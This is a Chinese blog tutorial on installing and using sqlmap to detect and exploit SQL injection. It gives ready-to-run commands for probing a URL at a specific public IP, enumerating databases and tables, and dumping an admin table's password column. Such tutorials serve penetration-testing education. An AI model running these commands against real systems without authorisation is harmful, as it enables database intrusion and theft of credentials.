sqlmap使用手册

最新推荐文章于 2024-06-30 23:24:37 发布
最新推荐文章于 2024-06-30 23:24:37 发布
阅读量6.6k 收藏 19
点赞数 8
分类专栏: web安全 文章标签: sqlmap sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shippingxing/article/details/88026014
版权

一、概述

1.1 简介

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它是由python语言编写而成。因此使用sqlmap时,需要在python环境中运行。

1.2 功能点

  • 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。
  • 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。
  • 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。
  • 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。
  • 支持自动识别密码哈希格式并通过字典破解密码哈希。
  • 支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。
  • 支持在数据库管理系统中搜索指定的数据库名、表名或列名。
  • 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。
  • 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。

二、安装

2.1 环境要求

 Python2.7(python3不支持)

2.2 安装步骤

  • 在sqlmap官网http://sqlmap.org/下载最新版本的sqlmap安装包(目前最新版本为1.3.2-25)。如下图所示:
    在这里插入图片描述
  • 将下载下来的安装包sqlmapproject-sqlmap-1.3.2-25-gaf890d6.zip解压到自己想存放的目录并重命名,这里以D盘为例,并将解压后的文件重命名为sqlmap。解压后的目录结构如下图所示:
    在这里插入图片描述
    验证sqlmap是否安装完成,可进行如下操作进行验证:
  • 打开cmd窗口,进入到python的安装目录(这里如果配置了python环境变量,则不需要进入到此目录):
    在这里插入图片描述
  • 执行如下命令:
python D:\sqlmap\sqlmap.py --version

若显示sqlmap版本号,则安装成功。如下图所示:
在这里插入图片描述

三、使用

3.1 初级用法

3.1.1 检测注入点
  • GET注入
python D:\sqlmap\sqlmap.py -u http://117.41.229.122:8003/?id=1

说明:
-u:指定注入点,后面直接跟上待测的目标url。

如果出现如下红框中的格式内容,则存在sql注入;如果没有,则不一定存在注入,可进一步进行渗透。
在这里插入图片描述
红框中显示了存在注入点的参数及注入的方式和内容。

  • POST注入
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --batch

说明:
-r:指定注入点,后面直接跟上文件名称,该文件记录了发送请求的报文,该报文可以利用抓包工具fiddle或burpsuit等获取。
在这里插入图片描述

3.1.2 暴库

所谓暴库,就是利用已有sql漏洞对数据库进行深层次的数据挖掘。暴库的一般过程如下:
数据库------>表------>列------->数据

  • 列出数据库:–dbs
    在这里插入图片描述
  • 列出数据库下的表:-D maoshe --tables
    在这里插入图片描述
  • 列出表中的列:-D maoshe -T admin --columns
    在这里插入图片描述
  • 列出表中固定列的数据:-D maoshe -T admin –C password --dump
    在这里插入图片描述
  • 若获取表中的所有数据,则直接使用-D maoshe -T admin --dump
    在这里插入图片描述

3.2 高级用法

  • 指定数据库 --dbms “Oracle”
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --dbms "oracle" --batch
  • 指定注入等级 --level
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --level 2 --batch
  • 指定注入风险级别 --risk
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --risk 2 --batch
  • 不使用缓存 --purge
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --purge --batch
  • 指定参数 -p
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt -p username --batch
  • 使用持久的http连接 --keep-alive
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --keep-alive --batch
  • 请求并发量 --threads
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt --threads 4 --batch
  • 开启所有的优化开关 -o
python D:\sqlmap\sqlmap.py -r C:\Users\Ramboo\Desktop\1.txt -o --batch

sqlmap的参数还有很多,在这里不一一列举,可参考网上相关教程。

行动π技术博客
关注
专栏目录
sqlmap中文使用手册
06-16
sqlmap的中文使用手册,非常实用,对常用的sqlmap命令参数、作用进行了一一介绍。
Sqlmap使用教程
B-Tree
02-24 3803
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
Sqlmap中文使用手册 - 各个参数介绍(持续更新)
最新发布
Reset
06-30 1052
sqlmap 是一款自动化检测与利用 SQL 注入漏洞的免费开源工具。
SQLmap 使用手册
执着
09-08 1528
Sqlmap 是由 Python 写成的,开源的自动化 SQL 注入工具和这一功能允许执行任意的 SQL 语句,Sqlmap 会自动解析给出的 SQL 语句,选择恰当的注入技术并将给出的 SQL 语句打包到 payload 中。如果查询是个 SELECT 语句,Sqlmap 会返回查询结果。如果 Web 应用使用的数据库管理系统支持多语句查询,Sqlmap使用堆注入技术。
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
记一份SQLmap 使用手册小结(一)1
08-03
以下是对SQLmap使用手册小结中的知识点的详细说明: 1. **注入点的检测**:SQLmap可以通过`-u`参数提供URL来自动检测是否存在SQL注入点。在描述中提到了使用`-v 3`以获取更详细的信息,`--batch`则让SQLmap以非交互...
SQLmap使用手册1
08-03
在Ubuntu系统中,你可以通过终端使用`pip`来安装SQLmap。首先确保你的系统已经安装了Python和pip,然后执行以下命令: ```bash sudo apt-get update sudo apt-get install python3-pip pip3 install sqlmap ``` 这将...
Sqlmap使用方法
w1304099880的博客
10-26 1260
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
sqlmap用户手册
11-30
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据
SQLMAP简易使用教程
nzw1134864657的博客
10-07 9231
SQLMap 一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL 注入漏洞,内置了很多绕过插件 1.1 SQLMap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同
sqlmap 使用教程
weixin_46962006的博客
11-14 2万+
                       sqlmap 使用教程 前言        个人观点,若有误请指教 Options(选项) -h:帮助文档 -‌-version:查看sqlmap版本信息 -v:显示详细信息    ·0:只显示python的错误和一些严重性的信息    ·1:显示基本信息(默认)    ·2:显示debug信息    ·3:显示注入过程的payload    ·4:显示http请求包    ·5:显示http响应头    ·6:显示http响应页面 Target(目标
SQL注入Sqlmap使用指南(手把手保姆版)持续更新
热门推荐
开水的博客
03-15 3万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 2201
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQLmap使用手册
m0_74301705的博客
03-25 148
sqlmap使用手册
pdf:sqlmap使用手册
07-04
### 回答1: SQLMap是一款开源的自动化测试工具,用于测试和利用Web应用程序中可能存在的SQL注入漏洞。本文主要介绍了SQLMap使用手册。 首先,安装SQLMap。我们可以从官方网站下载最新版本的SQLMap,并将其解压到我们希望存放的位置。然后,我们需要确保我们的系统上已经安装了Python,以便能够运行SQLMap。 接下来,我们需要了解SQLMap的基本命令和选项。SQLMap支持多种命令和选项,可以根据我们的需要进行配置。我们可以使用“-h”选项来查看SQLMap的帮助信息,了解每个选项的作用和用法。 在使用SQLMap之前,我们需要先进行目标选择。我们可以使用“-u”选项指定目标URL,并选择相应的数据库和表进行测试。我们还可以使用其他选项,如“-r”用于指定请求文件,或者“-g”用于指定Google搜索语句。 然后,我们可以使用“-p”选项指定要测试的参数,并使用“-D”和“-T”选项指定要测试的数据库和表。然后,我们可以使用其他选项,如“--columns”用于获取表的列名,或者“--dump”用于获取表的数据。 在进行SQL注入测试时,我们需要注意保护隐私和遵守法律。我们应该获得合法授权,并只在授权范围内进行测试。我们还应该注意测试中可能引发的安全问题,并及时向相关人员报告。 总的来说,SQLMap是一款功能强大的自动化测试工具,可以帮助我们快速发现和利用Web应用程序中可能存在的SQL注入漏洞。使用SQLMap时,我们需要了解其基本命令和选项,并确保遵守相关法律和规定。希望本文的使用手册能帮助大家更好地使用SQLMap。 ### 回答2: sqlmap是一款流行的用于检测和利用SQL注入漏洞的开源工具。它可以用来自动化地发现和利用Web应用程序中的SQL注入漏洞。在这个PDF文档中,我将向您介绍如何使用sqlmap来进行SQL注入攻击测试。 首先,我们需要确保已经安装了sqlmap。您可以从官方网站上下载最新版本的sqlmap,并根据安装说明进行安装。 在文档中,您将会学到如何使用sqlmap进行基本的SQL注入测试。首先,您需要获得一个目标网站的URL,并确认它存在SQL注入漏洞的迹象。接下来,您将使用sqlmap的命令行参数来指定目标URL和其他必要的选项。然后,sqlmap将会自动对目标网站进行扫描,并报告任何发现的SQL注入漏洞。 一旦sqlmap发现了SQL注入漏洞,您可以使用它来获取数据库的信息,执行任意SQL语句,甚至获取敏感信息。在使用sqlmap进行攻击之前,请确保您已经获得了合法的授权,并且尊重法律和道德规范。 该PDF文档还包括了有关sqlmap的高级用法和技巧的介绍。您将学习如何使用代理服务器来隐藏自己的身份,如何使用多线程和延迟来优化扫描速度,以及如何绕过常见的WAF(Web应用防火墙)和IDS(入侵检测系统)等等。 总的来说,这个PDF文档将为您提供一个全面的sqlmap使用指南。通过学习这个手册,您将能够使用sqlmap快速、准确地发现和利用Web应用程序中的SQL注入漏洞。希望这个文档对您有所帮助,祝您使用sqlmap进行安全测试工作顺利。 ### 回答3: sqlmap是一款用于自动化SQL注入的工具,可以帮助渗透测试人员评估和保护Web应用程序的安全性。它具有强大的功能和易于使用的界面,能够自动发现和利用Web应用程序中的SQL注入漏洞。 pdf:sqlmap使用手册是针对sqlmap工具的一份详细说明书,提供了关于sqlmap使用的详细指南和示例。它包含了sqlmap的安装、配置和使用方法,以及各种高级功能和选项的说明。 使用pdf:sqlmap使用手册可以帮助用户快速掌握sqlmap的基本操作和功能。手册中包括了从简单的注入检测到复杂的注入利用的步骤,以及如何配置和调整sqlmap的选项以满足不同的需求。 手册中还介绍了sqlmap的一些高级功能,如指纹识别、提权、文件读取和写入等。这些功能可以帮助用户更加深入地评估Web应用程序的安全性,发现更多的漏洞。 总之,pdf:sqlmap使用手册是一份非常有价值的资料,它提供了sqlmap工具的详尽说明和示例,帮助用户更好地了解和使用sqlmap。无论是初学者还是有经验的渗透测试人员,都可以通过该手册提高他们的技能和知识,有效地评估和保护Web应用程序的安全性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

行动π技术博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值